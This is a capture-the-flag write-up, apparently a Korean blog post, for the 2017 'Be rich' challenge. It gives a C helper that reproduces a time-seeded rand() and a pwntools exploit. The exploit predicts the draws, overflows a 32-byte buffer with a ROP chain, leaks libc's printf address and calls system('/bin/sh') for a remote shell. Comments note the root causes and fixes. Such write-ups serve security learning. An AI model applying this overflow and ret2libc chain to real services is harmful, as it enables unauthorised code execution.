H3X0R CTF Be richCTF 2017. 1. 8. 02:25
md5 calc 같은 문제. 머니는 타임 시드로 게싱해서 돈을 올리는 것. fsb 취약점이 있긴 했는데 그거 쓸 수 있나 모르겠네.
time.c
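/*
 * time.c - print rand() % 10000 + 1 for the current wall-clock second.
 *
 * The PRNG is seeded with time(0), so the printed value is fully
 * determined by the clock: every process that seeds the same way in the
 * same second prints the same number. Presumably this mirrors the draw
 * made by the challenge binary (the binary itself is not shown on the
 * page).
 *
 * Root cause being demonstrated: a time-seeded rand() is not a secret.
 * Values that gate money or access should come from the OS CSPRNG
 * (getrandom(2) or /dev/urandom), not from srand(time(0)).
 */
#include <stdio.h>
#include <stdlib.h> /* srand() and rand() are declared here; the original omitted it */
#include <time.h>

int main(void)
{
    /* Seed with one-second resolution, same value the original passed. */
    unsigned int seed = (unsigned int)time(NULL);
    int pick;

    srand(seed);
    pick = rand() % 10000 + 1; /* range 1..10000 */

    /* No trailing newline: exp.py reads this output verbatim, so the
     * byte-for-byte format is kept as the author wrote it. */
    printf("%d", pick);
    return 0;
}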
exp.py
# exp.py - the author's solver for the "Be rich" service (Python 2, pwntools).
#
# NOTE(review): the page collapsed the script onto one line. Line breaks and
# loop bodies below are reconstructed (each `for` is taken to own only the
# statement that follows it) - confirm against the original file.
#
# What the visible code does, in order:
#   1. Guessing phase: sends the output of ./time (a local srand(time(0)) /
#      rand() reproduction) to the service in five bursts.
#   2. First oversized input: 32 filler bytes followed by eight 32-bit words,
#      after which four bytes of the reply are read back as an address.
#   3. Second oversized input: 32 filler bytes followed by a computed address.
#
# Defender's reading of the root causes (the target binary is not shown, so
# these are inferences): a time-seeded rand() deciding the payout, an input
# path that accepts more than 32 bytes into a fixed-size buffer, and fixed
# 0x0804xxxx addresses, which suggests a non-PIE 32-bit build. The matching
# fixes are a CSPRNG for the draw, length-bounded reads, and building with
# stack protector, PIE and full RELRO.
from pwn import *
import time,os,random  # `random` is never used in the visible script

# Hard-coded remote endpoint of the 2017 CTF service.
p = remote("52.199.49.117",10002)
# Local test target, left disabled by the author:
#p = process("pwn100")
t = int(time.time())  # assigned but never read below
# Two initial lines of input: a "/bin/sh" string and an empty line.
# Presumably the service stores the first at a fixed address that the final
# payload passes as an argument (0x804a04c) - not verifiable from the page.
p.sendline("/bin/sh")
p.sendline('')

# --- Guessing phase -------------------------------------------------------
# Each burst re-runs ./time to get the value for the current second and
# repeats it; a one-second sleep separates bursts so the next call to
# ./time is seeded with a different second. Totals: 4 x 700 + 537 lines,
# plus one final send.
rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)
time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)
time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)
time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)
time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,537):
    p.sendline(rand)
# Same effect as sendline(rand): the value followed by a newline.
p.send(rand + '\n')

# --- First oversized input ------------------------------------------------
ppppr = 0x8048958          # never used below
pr = 0x8048958+3           # fixed address inside the binary, reused five times
offset = 0x4cdd0           # never used below
printf_libc = 0x49020      # printf's offset inside libc; presumably valid for
                           # one specific libc build only
# 32 filler bytes, then eight little-endian 32-bit words (p32). The role of
# each individual address cannot be confirmed from the page.
payload = "A"*32
payload += p32(0x80485FB)
payload += p32(pr)
payload += p32(0x804A00c)
payload += p32(0x8048681)
payload += p32(pr)*4
p.sendline(payload)
# Python 2 print statements: echo the service output up to each marker.
print p.recvuntil("Save Successfully!")
print p.recvuntil("Save Successfully!")
leak = p.recv(1)           # one byte is consumed and immediately overwritten
system_offset = 0x3a940    # system's offset inside the same libc build
# The next four bytes are treated as printf's runtime address; subtracting
# printf's known offset gives the libc load base for this connection.
leak = u32(p.recv(4))
image_base = leak - printf_libc
libc_system = image_base + system_offset
log.info("printf_libc: " + hex(leak))
log.info("system_libc: " + hex(libc_system))

# --- Second oversized input -----------------------------------------------
# Same 32-byte filler, then the computed address, a 4-byte placeholder and
# the fixed address 0x804a04c.
payload = "A"*32
payload += p32(libc_system)
payload += "AAAA"
payload += p32(0x804a04c)
p.sendline(payload)
# Hand the connection over to the terminal.
p.interactive()